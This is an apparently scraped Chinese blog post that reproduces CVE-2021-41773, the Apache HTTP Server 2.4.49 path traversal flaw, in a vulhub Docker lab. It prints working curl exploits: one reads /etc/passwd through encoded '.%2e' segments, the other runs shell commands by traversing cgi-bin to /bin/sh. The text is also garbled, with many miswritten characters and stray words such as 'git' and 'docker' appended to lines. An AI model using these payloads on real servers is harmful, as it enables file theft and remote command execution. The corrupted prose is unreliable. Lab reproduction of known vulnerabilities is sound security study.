Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)

2022年01月14日 阅读数:3
这篇文章主要向大家介绍Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773),主要内容包括基础应用、实用技巧、原理机制等方面,希望对大家有所帮助。

Apache HTTP Server 2.4.49 路径穿越漏洞复现(CVE-2021-41773)

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,知足下面两个条件的Apache服务器将会受到影响:git

  • 版本等于2.4.49
  • 穿越的目录容许被访问,好比配置了<Directory />Require all granted</Directory>。(默认状况下是不容许的)

攻击者利用这个漏洞,能够读取位于Apache服务器Web目录之外的其余文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。github

参考连接:https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.mdweb

环境启动

进入vulhub/httpd/CVE-2021-41773
docker-compose build
docker-compose up -d

访问本机ip的8080端口docker

在这里插入图片描述

使用curl工具直接访问本地/etc/passwd服务器

curl -v --path-as-is http://192.168.8.143:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

若是服务端开启了cgi或cgid这两个mod的状况下,这个路径穿越漏洞将能够执行任意命令:curl

curl -v --data "echo;命令" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

在这里插入图片描述